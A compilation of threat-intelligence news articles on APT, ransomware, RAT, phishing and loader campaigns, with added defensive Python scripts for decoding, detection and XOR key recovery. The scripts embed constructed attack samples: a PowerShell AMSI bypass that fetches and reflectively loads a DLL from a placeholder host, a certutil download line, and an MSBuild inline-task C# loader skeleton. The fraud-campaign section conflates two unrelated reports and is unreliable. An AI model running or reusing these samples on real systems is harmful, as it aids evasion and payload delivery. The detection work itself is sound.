

Chinese APT Utilizes Ransomware to Cover Cyberespionage


A China-based advanced persistent threat (APT) group tracked as Bronze Starlight has been active since the start of 2021. It appears to be using ransomware and double-extortion attacks as cover for routine, state-sponsored cyberespionage and intellectual property theft.

Bronze Starlight is characterized by the deployment of post-intrusion ransomware, including LockFile, Atom Silo, Rook, Night Sky, Pandora, and LockBit 2.0. Microsoft tracks overlapping activity as the emerging threat cluster DEV-0401 and notes its involvement in every phase of the ransomware attack cycle, from initial access to payload deployment.

Links to China

In each intrusion the threat actor has used a malware loader known as HUI Loader to load Cobalt Strike Beacon and then deploy ransomware on compromised hosts. HUI Loader has only been observed in use by China-based groups, and Secureworks researchers say they have not seen this combination used by any other threat actor.

Secureworks researchers assess that Bronze Starlight is more likely motivated by cyberespionage and intellectual property (IP) theft than by financial gain, citing the short lifespan of each ransomware family, the victimology, and the group's access to tooling used by Chinese state-sponsored actors (including the HUI Loader and a common set of exploited vulnerabilities). HUI Loader has been used since at least 2015 to deliver remote access trojans (RATs) and other payloads such as Cobalt Strike, QuasarRAT, PlugX, and SodaMaster.

The actor's intrusions are distinguished by the exploitation of vulnerabilities affecting Exchange Server, Zoho ManageEngine ADSelfService Plus, Atlassian Confluence, and Apache Log4j for initial access. This contrasts with most ransomware-as-a-service (RaaS) groups, which buy access from initial access brokers (IABs).

Similarities between the ransomware families

A common operator is also apparent from the similarities between LockFile, Atom Silo, Rook, Night Sky, and Pandora; the latter three were built from the Babuk ransomware source code, which leaked in September 2021.

The researchers write that the use of HUI Loader to load Cobalt Strike Beacon, the configuration data for Cobalt Strike Beacon, the C2 network, and the code overlap "indicate that the same threat group is linked with these 5 ransomware families."

The use of HUI Loader to launch encrypted next-stage payloads such as PlugX and Cobalt Strike Beacon, which are then used to push the ransomware, is another instance of the observed tradecraft. The technique requires the actor to have already obtained privileged Domain Administrator credentials.

The main victims are American and Brazilian pharmaceutical firms, a U.S. media outlet with branches in China and Hong Kong, Lithuanian and Japanese electronic component designers and manufacturers, a U.S. legal company, and the aerospace & defense unit of an Indian conglomerate. 

Ransomware operations thus serve the threat actor in two ways: the double-extortion model provides cover for the exfiltration of data, and the encryption stage gives the actor a chance to destroy forensic evidence of its activity and distract responders from the data theft.

Attackers Exploit Telerik Vulnerabilities to Deploy Cobalt Strike


A threat actor tracked as 'Blue Mockingbird' is exploiting Telerik UI flaws to breach servers, install Cobalt Strike beacons, and deploy cryptomining malware.

The vulnerability, tracked as CVE-2019-18935 with a critical severity score (CVSS v3.1: 9.8), affects the Telerik UI library for ASP.NET AJAX. It is an insecure-deserialization bug that can lead to remote code execution.

Blue Mockingbird was previously seen in May 2020 targeting vulnerable Microsoft IIS servers that used Telerik UI, a year after the vendor had published patches. Earlier this week, Sophos researchers reported that Blue Mockingbird is leveraging the same flaw in a new wave of attacks.

To exploit CVE-2019-18935, the attackers must first obtain the encryption keys that protect Telerik UI's serialized data on the target. This can be done by exploiting CVE-2017-11317 and CVE-2017-11357 or by abusing another vulnerability in the target web application.

Because many web applications embed whichever Telerik UI version was current when they were developed and were never updated afterwards, they remain viable targets. Once the keys are obtained, the attackers can compile a malicious DLL containing the code to be executed during deserialization and have it run in the context of the 'w3wp.exe' IIS worker process.

According to the researchers, in the recent attacks Blue Mockingbird used a publicly available proof-of-concept (PoC) exploit to handle the encryption logic and automate the DLL compilation. The payload is a Cobalt Strike beacon, a legitimate penetration-testing tool that attackers abuse; here it is used to execute encoded PowerShell commands.

Persistence is achieved through Active Directory Group Policy Objects (GPOs) that create scheduled tasks; the task runs base64-encoded PowerShell stored in a new registry entry. To evade Windows Defender, the script uses common AMSI-bypass techniques to download and load a Cobalt Strike DLL into memory.
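As an added example (not code from the original post or from Sophos), the following Python decodes a base64-encoded PowerShell command of the kind a GPO-created scheduled task would launch and flags the AMSI-tampering and in-memory-loading idioms a responder should look for. The sample task action, the indicator lists, and the placeholder host example.invalid are constructed for this illustration.

```python
import base64
import re

# Indicator lists are this example's assumptions, drawn from widely published
# AMSI-tampering and in-memory loading patterns; they are not from the report.
AMSI_INDICATORS = [
    r"amsiInitFailed",
    r"AmsiUtils",
    r"AmsiScanBuffer",
    r"AmsiOpenSession",
]
LOADER_INDICATORS = [
    r"\[System\.Reflection\.Assembly\]::Load\(",
    r"\[Reflection\.Assembly\]::Load\(",
    r"DownloadData\(",
    r"DownloadString\(",
    r"\bIEX\b|Invoke-Expression",
]

# -EncodedCommand accepts any unambiguous prefix: -e, -ec, -enc, -encodedcommand
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_powershell(blob: str) -> str:
    """Reverse of encode_powershell; raises ValueError/UnicodeDecodeError on bad input."""
    return base64.b64decode(blob).decode("utf-16le")


def analyze_task_action(action: str) -> dict:
    """Decode every encoded command in a scheduled-task action string and flag indicators."""
    findings = {"decoded": [], "amsi_bypass": False, "in_memory_loader": False}
    for blob in ENCODED_ARG.findall(action):
        try:
            script = decode_powershell(blob)
        except (ValueError, UnicodeDecodeError):
            continue  # not a valid encoded command; ignore
        findings["decoded"].append(script)
        if any(re.search(p, script, re.IGNORECASE) for p in AMSI_INDICATORS):
            findings["amsi_bypass"] = True
        if any(re.search(p, script, re.IGNORECASE) for p in LOADER_INDICATORS):
            findings["in_memory_loader"] = True
    return findings


# Constructed sample: what a GPO-created scheduled task's action might look like.
# The script body is a stand-in using public AMSI-tamper and reflective-load idioms;
# the URL is a placeholder (example.invalid) and nothing here is executed.
SAMPLE_SCRIPT = (
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true);"
    "$b=(New-Object Net.WebClient).DownloadData('http://example.invalid/b.dll');"
    "[System.Reflection.Assembly]::Load($b)"
)
SAMPLE_ACTION = "powershell.exe -nop -w hidden -enc " + encode_powershell(SAMPLE_SCRIPT)
BENIGN_ACTION = "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1"

if __name__ == "__main__":
    for label, action in (("sample", SAMPLE_ACTION), ("benign", BENIGN_ACTION)):
        print(label, analyze_task_action(action))
```

The registry value or the task's XML action can be fed in as the action string. Because -EncodedCommand takes UTF-16LE, decoding the blob as UTF-8 yields interleaved null bytes, which is why decode_powershell uses utf-16le. Matching on amsiInitFailed and AmsiUtils catches the common reflection-based AMSI patch; obfuscated variants need the decoded script de-obfuscated first.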

The second-stage program ('crby26td.exe') is XMRig, a common open-source miner for Monero, a cryptocurrency favored by criminals for its privacy properties. Cryptomining was also the primary goal of the actor's 2020 campaign, so the attack chain, techniques, and goals have not changed significantly.

Cobalt Strike, however, enables easy lateral movement within a compromised network, data exfiltration, account takeover, and the deployment of more damaging payloads such as ransomware. It remains unclear whether Blue Mockingbird intends to pursue these possibilities or, for the time being, is focused solely on Monero mining.

Gh0stCringe Malware Recently Attacked Insecure Microsoft SQL and MySQL Servers


Hackers are deploying the Gh0stCringe remote access trojan on vulnerable machines by targeting inadequately secured Microsoft SQL and MySQL database servers.

Gh0stCringe, also known as CirenegRAT, is a variant of the Gh0st RAT malware that was most recently used in Chinese cyberespionage activity in 2020, though it has been around since 2018. The malware has several commands and functions that can be activated after it connects to its command-and-control (C2) server, or through data stored in the malware's configuration.

Attackers can use Gh0stCringe to download payloads such as cryptominers from C2 servers, open specified websites in the Internet Explorer web browser, and even wipe the boot disk's Master Boot Record (MBR). The malware includes a keylogger, which, if activated, records input in a file named Default.key in the Windows System directory.

Threat actors are breaching database servers and writing the malicious 'mcsql.exe' executable to disk through the mysqld.exe, mysqld-nt.exe, and sqlservr.exe processes. These attacks resemble earlier Microsoft SQL Server intrusions in which the xp_cmdshell stored procedure was used to drop Cobalt Strike beacons. In addition to Gh0stCringe, AhnLab's analysis notes the presence of numerous other malware samples on the investigated servers, implying that several competing threat actors are breaking into the same poorly secured servers to drop their own payloads.
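As an added example (not AhnLab's code), here is a Python check that runs the parent-child logic described above over constructed process-creation records: a database engine spawning a shell or LOLBin, or launching a binary outside its install tree, is exactly the pattern an xp_cmdshell drop or a dropped mcsql.exe produces. The record format, the paths, and the mcsql.exe location are constructed for this illustration.

```python
import ntpath

# Database engines that should never spawn shells or drop binaries in normal operation
DB_SERVER_PROCESSES = {"sqlservr.exe", "mysqld.exe", "mysqld-nt.exe"}
# Interpreters and living-off-the-land binaries typically reached via xp_cmdshell
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "bitsadmin.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "wscript.exe", "cscript.exe"}
# Directories from which a database engine may legitimately launch helpers (assumption)
TRUSTED_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\")


def parse_event(line: str) -> dict:
    """Parse a constructed 'timestamp|Key=Value|Key=Value' process-creation record."""
    timestamp, *fields = line.split("|")
    event = {"Timestamp": timestamp}
    for field in fields:
        key, _, value = field.partition("=")
        event[key] = value
    return event


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def classify(event: dict):
    """Return a reason string if the event is suspicious, else None."""
    if basename(event.get("ParentImage", "")) not in DB_SERVER_PROCESSES:
        return None
    child_path = event.get("Image", "")
    if basename(child_path) in LOLBINS:
        return "database engine spawned a shell/LOLBin (xp_cmdshell-style execution)"
    if not child_path.lower().startswith(TRUSTED_PREFIXES):
        return "database engine launched a binary outside its install tree (dropped payload)"
    return None


def find_suspicious(lines) -> list:
    """Return (timestamp, parent, child image, reason) for each suspicious record."""
    hits = []
    for line in lines:
        event = parse_event(line)
        reason = classify(event)
        if reason:
            hits.append((event["Timestamp"], basename(event["ParentImage"]), event["Image"], reason))
    return hits


# Constructed sample records (not real telemetry): two intrusions of the kind described
# above plus two benign events. The download host example.invalid is a placeholder.
SAMPLE_EVENTS = [
    "2022-03-10T02:14:07|ParentImage=C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe"
    "|Image=C:\\Windows\\System32\\cmd.exe|CommandLine=cmd.exe /c certutil -urlcache -f http://example.invalid/b.exe C:\\Windows\\Temp\\b.exe",
    "2022-03-10T02:20:41|ParentImage=C:\\Program Files\\MySQL\\MySQL Server 5.7\\bin\\mysqld.exe"
    "|Image=C:\\Windows\\Temp\\mcsql.exe|CommandLine=mcsql.exe",
    "2022-03-10T03:00:00|ParentImage=C:\\Program Files\\Microsoft SQL Server\\MSSQL15.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe"
    "|Image=C:\\Program Files\\Microsoft SQL Server\\150\\Shared\\SQLDumper.exe|CommandLine=SQLDumper.exe 1234 0 0x0128",
    "2022-03-10T08:30:12|ParentImage=C:\\Windows\\explorer.exe|Image=C:\\Windows\\System32\\notepad.exe|CommandLine=notepad.exe",
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(*hit, sep=" | ")
```

The trusted-prefix rule keeps legitimate helpers such as SQLDumper.exe quiet while still catching a payload written to a temp directory; tune the prefixes to the real install path of each server before deploying the rule.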

Gh0stCringe RAT is a capable piece of malware that connects to a C2 server to receive commands or exfiltrate stolen data to the attackers. Its keylogging component polls the state of each key in an endless loop using the Windows GetAsyncKeyState API. This otherwise reliable recording method carries the risk of very high CPU utilization, but that is unlikely to concern threat actors operating on poorly maintained servers. The malware records keystrokes for the previous three minutes and sends them to its C2 servers along with basic system and network information.

With these logged keystrokes, threat actors can steal login passwords and other sensitive information that logged-in users typed on the device. CirenegRAT has four operating modes: 0, 1, 2, and a specific Windows 10 mode, which the threat actor selects at deployment time.

Keep server software up to date with the latest security patches, which closes off the known flaws used in many of these attacks. It is also critical to use a strong administrator password that cannot be brute-forced. The most important step is to place the database server behind a firewall so that only authorized hosts can connect to it.

Emotet Malware Campaign Masquerades the IRS for 2022 Tax Season


The Emotet malware botnet is taking advantage of the 2022 United States tax season by sending out fraudulent emails that pose as the Internal Revenue Service and claim to deliver tax forms or federal returns.

Emotet is spread via phishing emails carrying Word or Excel documents with malicious macros. When a user opens one of these documents, they are tricked into enabling macros, which install the Emotet malware on the device. Once running, Emotet steals the victim's emails for use in future reply-chain attacks, sends more spam, and eventually installs other malware that can lead to a Conti ransomware attack on the network.

Researchers have discovered various phishing campaigns impersonating the Internal Revenue Service (IRS.gov) with lures tied to the 2022 US tax season, according to a recent analysis by email security firm Cofense. The emails purport to come from the IRS and claim to be sending the recipient their 2021 tax return, W-9 forms, or other documents commonly needed during tax season.

While the subject lines and content of the IRS-themed emails vary, the basic premise is that the IRS is contacting the company with either completed tax forms or forms that must be filled out and returned. The emails carry zip files, or HTML pages that lead to zip files, and the archives are password-protected to evade inspection by secure email gateways. Third-party archive tools such as 7-Zip extract the files without difficulty once the password is entered.

The zip files contain a 'W-9 form.xlsm' Excel file that, when opened, prompts the user to click the 'Enable Editing' and 'Enable Content' buttons to view the document correctly. Clicking these buttons runs the malicious macros, which download and install Emotet from compromised WordPress sites. Once Emotet is loaded, it downloads further payloads, which in recent campaigns have mostly been Cobalt Strike.
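As an added example (not Cofense's code or the campaign's tooling), the following Python shows how a mail gateway can look inside the attachment chain described above: it walks a zip archive, recurses into nested zips and OOXML documents (which are zip containers themselves), reports entries it cannot open because they are password-protected, and flags macro-enabled documents and embedded vbaProject.bin streams. The sample attachment is constructed in code; it is not password-protected because the standard library cannot write encrypted zips, so the 'hold' verdict is exercised only on real attachments.

```python
import io
import zipfile

MACRO_EXTENSIONS = (".xlsm", ".xltm", ".docm", ".dotm", ".pptm")
CONTAINER_EXTENSIONS = (".zip",) + MACRO_EXTENSIONS  # OOXML files are zip containers too


def is_encrypted(info: zipfile.ZipInfo) -> bool:
    """Bit 0 of the general-purpose flag marks a password-protected entry."""
    return bool(info.flag_bits & 0x1)


def inspect_archive(data: bytes, depth: int = 0, max_depth: int = 3) -> dict:
    """Walk a zip (and nested zips/OOXML containers) and collect what a gateway needs to know."""
    findings = {"encrypted_entries": [], "macro_documents": [], "vba_projects": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            name = info.filename
            lname = name.lower()
            if is_encrypted(info):
                # Cannot inspect without the password that the email body supplies
                findings["encrypted_entries"].append(name)
                continue
            if lname.endswith(MACRO_EXTENSIONS):
                findings["macro_documents"].append(name)
            if lname.endswith("vbaproject.bin"):
                findings["vba_projects"].append(name)
            if depth < max_depth and lname.endswith(CONTAINER_EXTENSIONS):
                inner = zf.read(name)
                if inner[:2] == b"PK":  # zip local-file-header signature
                    nested = inspect_archive(inner, depth + 1, max_depth)
                    for key, values in nested.items():
                        findings[key].extend(f"{name}/{v}" for v in values)
    return findings


def verdict(findings: dict) -> str:
    if findings["vba_projects"] or findings["macro_documents"]:
        return "block"   # macro-enabled document: the lure described above
    if findings["encrypted_entries"]:
        return "hold"    # cannot be scanned; route to an analyst or detonate with the password
    return "allow"


def build_sample_attachment() -> bytes:
    """Constructed stand-in for the campaign's attachment: a zip holding a macro-enabled workbook.
    The vbaProject.bin content is a placeholder, not real VBA."""
    doc = io.BytesIO()
    with zipfile.ZipFile(doc, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("W-9 form.xlsm", doc.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    result = inspect_archive(build_sample_attachment())
    print(result, "->", verdict(result))
```

Checking the flag bit rather than trying to open each entry is what lets the gateway decide "hold" without the password; an attachment whose macro document is only visible after the user types the password from the email body still gets stopped, just one step later.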

Emotet has also dropped the SystemBC remote access trojan, according to Cryptolaemus, an Emotet research group. With the Conti ransomware gang now reported to be developing Emotet, businesses large and small should watch for these phishing tactics, which can escalate to ransomware attacks and data theft. Remember that the IRS does not send unsolicited emails and initiates contact by postal mail. If you receive an email purporting to be from the IRS, flag it as spam and delete it.

A Worldwide Fraud Campaign Used Targeted Links to Rob Millions of Dollars


Large-scale phishing activity employing hundreds of domains to steal credentials for Naver, a Google-like web platform in South Korea, shows infrastructure overlaps with the TrickBot botnet. The resources committed to this operation demonstrate the scale of the cybercriminal effort to harvest login data for use in further attacks.

Naver, like Google, offers a wide range of services, including web search, email, news, and the NAVER Knowledge iN online Q&A platform. Because of password reuse, its credentials can grant access not only to regular user accounts but also to enterprise environments.

Earlier this year, researchers at cyber intelligence firm Prevailion began their inquiry with a domain name shared by Joe Słowik, mailmangecorp[.]us, which led to a "vast network of targeted phishing infrastructure designed to gather valid login credentials for Naver." While investigating the hosting infrastructure serving the Naver-themed phishing pages, Prevailion's PACT analysts also found overlaps with the WIZARD SPIDER (TrickBot) network.

The fraudsters behind the survey scam lured victims with fake surveys and giveaways purporting to come from well-known brands in order to steal personal and credit card information. Tens of millions of people in 91 countries, including the United States, Canada, South Korea, and Italy, were shown to have been targeted.

To draw in potential victims, the criminals sent out invitations to take a survey, with the promise of a prize on completion. The campaign used advertising on both legitimate and rogue websites, contextual advertising, SMS and email messages, and pop-up notifications. To build trust, lookalike domains modeled on legitimate ones were registered. In the Naver operation, 542 unique domains were linked to the activity, 532 of them used for Naver-themed phishing, and the operator was found to register groups of domains tied to a single IP address under one email address.

According to the researchers, two Cobalt Strike beacon samples on VirusTotal were linked to 23.81.246[.]131 as part of a campaign that used CVE-2021-40444 to spread Conti ransomware, a typical TrickBot payload. In the survey scam, the final page's content is personalized to the victim's interests, and the customized link can be opened only once, which makes detection significantly harder and lets the scheme run longer.

The victim is told they are eligible for a prize but must supply personal information, including full name, email and physical addresses, phone number, and credit card details (expiration date and CVV included). Prevailion believes one explanation for its findings is that the cybercriminals run their operations on an "infrastructure-as-a-service" model.

Entropy Ransomware Connected to Dridex Malware, as per Sophos


The recently discovered Entropy ransomware shares code with the Dridex malware, which began life as a banking trojan. Researchers established the link after two Entropy attacks on different organizations.

According to Sophos principal researcher Andrew Brandt, a detection signature written to catch Dridex fired on Entropy, which prompted a closer look at the new malware. Both targeted organizations had unprotected devices; where endpoint protection was present, the signature for the Dridex packer code also detected the Entropy packer code and blocked the attack.

In both incidents, the attackers gained remote access to the target networks by infecting them with Cobalt Strike Beacons and Dridex before deploying Entropy. Despite the similarities, the two attacks differed greatly in the initial access vector used to get into the networks, the time spent in each environment, and the malware used to launch the final stage of the intrusion.

The attack on the media company used the ProxyShell vulnerabilities to plant a web shell on a vulnerable Exchange Server, which was then used to deploy Cobalt Strike Beacons across the network. The attacker is believed to have spent four months on reconnaissance and data theft before launching the ransomware in December 2021. The second attack, on a provincial government agency, began with a malicious email attachment carrying Dridex.

Notably, before the files on the compromised machines were encrypted, confidential documents were exfiltrated redundantly to more than one cloud storage service, as packed RAR archives, within 75 hours of the first suspicious login session on a single machine. Beyond the shared use of legitimate tools such as AdFind, PsExec, and PsKill, the resemblance between the Dridex and Entropy samples and earlier DoppelPaymer extortion infections raises the likelihood of a "similar origin."

The web of links between these malware families is worth noting: Dridex, an information-stealing botnet, is believed to be the work of Indrik Spider, the well-known Russian cybercrime outfit also known as Evil Corp.

The Evil Corp cluster continues to refine its tradecraft, continually changing payload signatures, exploitation tools, and initial access methods to frustrate attribution. SentinelOne researchers identified the "evolutionary" ties in a separate analysis, citing nearly identical design, implementation, and functionality across iterations of the malware, with the file-encrypting payload hidden using a packer named CryptOne.

"The attackers took advantage of a lack of attention in both situations - both targets had vulnerable Windows PCs which were missing relevant patches and updates," said Andrew Brandt, principal researcher at Sophos. Had the Exchange Server been patched properly, the attackers would have had to work much harder to gain initial access.

Threat Actors use MSBuild to Execute Cobalt Strike Beacons


Malicious campaigns have recently been spotted abusing the Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on compromised machines. MSBuild, which was designed to build Windows applications, uses a project-file element called 'Tasks' to designate components that are executed during a build, and threat actors are misusing these tasks to run malicious code under the cover of a legitimate, Microsoft-signed binary. Renato Marinho, a Morphus Labs security researcher and SANS Internet Storm Center (ISC) handler, reports that two different malicious campaigns using MSBuild for code execution were spotted in the past week.

MSBuild is a build tool that automates the software development process, including source code compilation, packaging, testing, deployment, and documentation generation. Visual Studio projects and solutions can be built with MSBuild even when the Visual Studio IDE is not installed. MSBuild is free and open source. It was previously shipped with the .NET Framework; starting with Visual Studio 2013, it is shipped with Visual Studio. MSBuild is a functional replacement for the nmake utility, which is still used in projects created with older Visual Studio editions.

MSBuild operates on project files with an XML syntax comparable to Apache Ant or NAnt. Although the syntax is based on a well-defined XML schema, the basic structure and operation are comparable to the traditional Unix make utility: the user specifies the inputs (typically source files) and the desired output (typically a static library, DLL, or executable), and the tool decides what to do and in which order to carry out the build.

Threat actors typically obtain access to the target environment with a legitimate remote desktop protocol (RDP) account, use remote Windows Services (SCM) for lateral movement, and then use MSBuild to execute the Cobalt Strike Beacon payload. The malicious MSBuild project is crafted to compile and run embedded C# code, which decodes and executes Cobalt Strike.
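As an added example (not Marinho's or the attackers' project file), the following Python parses MSBuild project XML for inline tasks, which is where the embedded C# described above lives: a UsingTask element with an inline TaskFactory (CodeTaskFactory or RoslynCodeTaskFactory) and a Code child. The sample project, the task name RunStage, and the memory-API indicator list are constructed for this illustration; the sample code body contains no payload and is never compiled or run here.

```python
import xml.etree.ElementTree as ET

# Task factories that compile and run code embedded in the project file itself
INLINE_TASK_FACTORIES = {"codetaskfactory", "roslyncodetaskfactory"}
# Memory/loader APIs that have no place in a build task (assumed indicator list)
SUSPICIOUS_APIS = ("VirtualAlloc", "VirtualProtect", "CreateThread", "Marshal.Copy",
                   "FromBase64String", "WriteProcessMemory", "CreateRemoteThread",
                   "GetDelegateForFunctionPointer")


def local_name(tag: str) -> str:
    """Strip the MSBuild XML namespace so old-style and SDK-style projects parse alike."""
    return tag.rsplit("}", 1)[-1]


def find_inline_tasks(project_xml: str) -> list:
    """Return one record per inline <Code> block found under an inline-factory UsingTask."""
    root = ET.fromstring(project_xml.strip())
    hits = []
    for element in root.iter():
        if local_name(element.tag) != "UsingTask":
            continue
        factory = element.get("TaskFactory", "")
        if factory.lower() not in INLINE_TASK_FACTORIES:
            continue
        for code in element.iter():
            if local_name(code.tag) != "Code":
                continue
            hits.append({
                "task": element.get("TaskName", ""),
                "factory": factory,
                "language": code.get("Language", ""),
                "type": code.get("Type", ""),
                "code": (code.text or "").strip(),
            })
    return hits


def score(hit: dict) -> list:
    """APIs from the indicator list that appear in the inline code."""
    return [api for api in SUSPICIOUS_APIS if api in hit["code"]]


# Constructed sample: the shape of a project that carries its own C# task. The base64
# string is a placeholder and the class allocates memory but never transfers execution.
SAMPLE_MALICIOUS_PROJECT = r"""
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Run">
    <RunStage />
  </Target>
  <UsingTask TaskName="RunStage" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        using System;
        using System.Runtime.InteropServices;
        using Microsoft.Build.Utilities;
        public class RunStage : Task {
            [DllImport("kernel32")] static extern IntPtr VirtualAlloc(IntPtr a, uint s, uint t, uint p);
            public override bool Execute() {
                byte[] buf = Convert.FromBase64String("AAAA"); // placeholder, not a payload
                IntPtr mem = VirtualAlloc(IntPtr.Zero, (uint)buf.Length, 0x3000, 0x40);
                Marshal.Copy(buf, 0, mem, buf.Length);
                return true;
            }
        }
      ]]></Code>
    </Task>
  </UsingTask>
</Project>
"""

SAMPLE_BENIGN_PROJECT = r"""
<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net6.0</TargetFramework>
  </PropertyGroup>
</Project>
"""

if __name__ == "__main__":
    for hit in find_inline_tasks(SAMPLE_MALICIOUS_PROJECT):
        print(hit["task"], hit["factory"], hit["language"], "->", score(hit))
```

Run this over any .proj, .csproj or .xml passed on an msbuild.exe command line captured in process telemetry; a project with an inline task that touches VirtualAlloc or Marshal.Copy is not building software. Legitimate inline tasks exist, so the score list, not the mere presence of a UsingTask, should drive the alert.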

Marinho further notes that after confirming that Beacon was used in the attack, he was able to decrypt the SSL-encrypted communication with the command-and-control (C&C) server. To prevent such attacks, the researcher recommends that enterprises use a Windows Defender Application Control (WDAC) policy to block Microsoft-signed applications that can be abused to execute other code; Microsoft publishes a list of such applications in its recommended block rules, and MSBuild.exe is on it.

"There is a note for MSBuild.exe, though, that if the system is used in a development context to build managed applications, the recommendation is to allow MSBuild.exe in the code integrity policies," Marinho concluded.

Blister Malware Silently Slips Through Windows Defences


Cybersecurity researchers have revealed details of an evasive malware campaign that uses valid code-signing certificates to bypass security defenses and remain undetected, with the aim of deploying Cobalt Strike and BitRAT payloads on infected systems. Elastic Security researchers dubbed the binary, a loader, "Blister"; the samples had negligible to zero detections on VirusTotal. The infection vector used to stage the attacks, and the eventual goals of the intrusions, are unknown.

A notable aspect of the attacks is the use of a legitimate Sectigo code-signing certificate. Malware signed with the certificate has been observed since September 15, 2021. Elastic said it has contacted the company to have the abused certificate revoked. "Executables with valid code signing certificates are often scrutinized to a lesser degree than unsigned executables," researchers Joe Desimone and Samir Bousseaden said. "Their use allows attackers to remain under the radar and evade detection for a longer period of time."

Another intriguing component of the campaign is what looks to be a novel malware loader with few VirusTotal detections, known as the BLISTER loader. The loader is likely spliced into legitimate libraries such as colorui.dll so that most of the on-disk footprint consists of known-good code and metadata. It is initially written to disk by simple dropper executables. One such dropper saves a signed BLISTER loader to %temp%\Framwork\axsssig.dll and runs it with rundll32. LaunchColorCpl is a common DLL export and entry-point name for BLISTER.

When run, BLISTER uses a simple 4-byte XOR routine to decode bootstrapping code stored in its resource section. The bootstrapping code is heavily obfuscated and initially sleeps for 10 minutes, almost certainly to evade sandbox analysis. After the delay it decrypts the embedded malware payload; researchers have identified Cobalt Strike and BitRAT as the embedded payloads. Once decoded, the payload is either loaded into the current process or injected into a newly spawned WerFault.exe process.
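As an added example (not Elastic's code or Blister's), the following Python shows the known-plaintext recovery a responder would apply to a 4-byte XOR layer like the one described above when the encoded data is a PE image: the first two key bytes fall out of the 'MZ' header, and the remaining two are brute-forced and validated by checking that the decoded e_lfanew field points at a 'PE\0\0' signature. The sample resource, its key, and the PE stub are constructed. The assumption that the plaintext is a PE holds for the embedded Beacon or BitRAT payload stage, not for the obfuscated bootstrapping shellcode, which would need a different known plaintext.

```python
from itertools import cycle
from typing import Optional, Tuple


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same routine encodes and decodes."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_key(ciphertext: bytes) -> Optional[bytes]:
    """Recover a 4-byte XOR key assuming the plaintext is a PE image.

    'MZ' gives key[0] and key[1] directly. key[2] and key[3] are brute-forced
    (65536 candidates) and validated by decoding e_lfanew (offset 0x3C) and
    checking for the 'PE\\0\\0' signature at that offset.
    """
    if len(ciphertext) < 0x40:
        return None
    k0 = ciphertext[0] ^ ord("M")
    k1 = ciphertext[1] ^ ord("Z")
    for k2 in range(256):
        for k3 in range(256):
            key = bytes((k0, k1, k2, k3))
            # 0x3C is a multiple of 4, so the key is aligned at e_lfanew
            e_lfanew = int.from_bytes(xor_bytes(ciphertext[0x3C:0x40], key), "little")
            if e_lfanew < 0x40 or e_lfanew + 4 > len(ciphertext):
                continue
            # The signature may sit at any alignment: index the key by absolute offset
            sig = bytes(c ^ key[(e_lfanew + i) % 4]
                        for i, c in enumerate(ciphertext[e_lfanew:e_lfanew + 4]))
            if sig == b"PE\x00\x00":
                return key
    return None


def decode_resource(ciphertext: bytes) -> Tuple[bytes, bytes]:
    """Return (key, plaintext) or raise if no 4-byte key yields a PE image."""
    key = recover_key(ciphertext)
    if key is None:
        raise ValueError("no 4-byte key yields a PE image; plaintext is not a PE or key length differs")
    return key, xor_bytes(ciphertext, key)


def build_sample_pe() -> bytes:
    """Constructed stand-in for an embedded payload: a minimal DOS header whose
    e_lfanew points at a PE signature, followed by filler. Not a runnable image."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    dos[0x3C:0x40] = (0x80).to_bytes(4, "little")
    return bytes(dos) + bytes(0x80 - 0x40) + b"PE\x00\x00" + b"\x4c\x01" + b"constructed placeholder body" * 4


SAMPLE_KEY = b"\xde\xad\xbe\xef"                     # assumed key, chosen for the example
SAMPLE_RESOURCE = xor_bytes(build_sample_pe(), SAMPLE_KEY)

if __name__ == "__main__":
    key, plain = decode_resource(SAMPLE_RESOURCE)
    print("recovered key:", key.hex(), "| header:", plain[:2], "| PE sig ok:", plain[0x80:0x84] == b"PE\x00\x00")
```

The e_lfanew bounds check is what keeps the search honest: a wrong key pair shifts the high bytes of the offset out of the blob, so only the real key survives to the signature test. For a resource that is shellcode rather than a PE, swap the 'MZ'/'PE' checks for a few bytes of a known prologue.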

Elastic Security has notified Sectigo so that Blister's code-signing certificate can be revoked, and the company has also published a YARA rule to help organizations identify the new malware.

‘Karakurt’ Extortion Back with an Upswing


A new financially motivated attack group has been on the rise of late, and unlike previous groups it does not appear to be interested in deploying ransomware or attacking high-profile targets.

Accenture Security researchers have been investigating a group that calls itself "Karakurt," meaning "black wolf" in Turkish and also the name of a venomous spider found in eastern Europe and Siberia.

Karakurt specializes in data exfiltration followed by extortion, which lets it operate quickly. It had claimed more than 40 victims by September, 95 percent of them in North America and the rest in Europe, according to a report the researchers released on Friday.

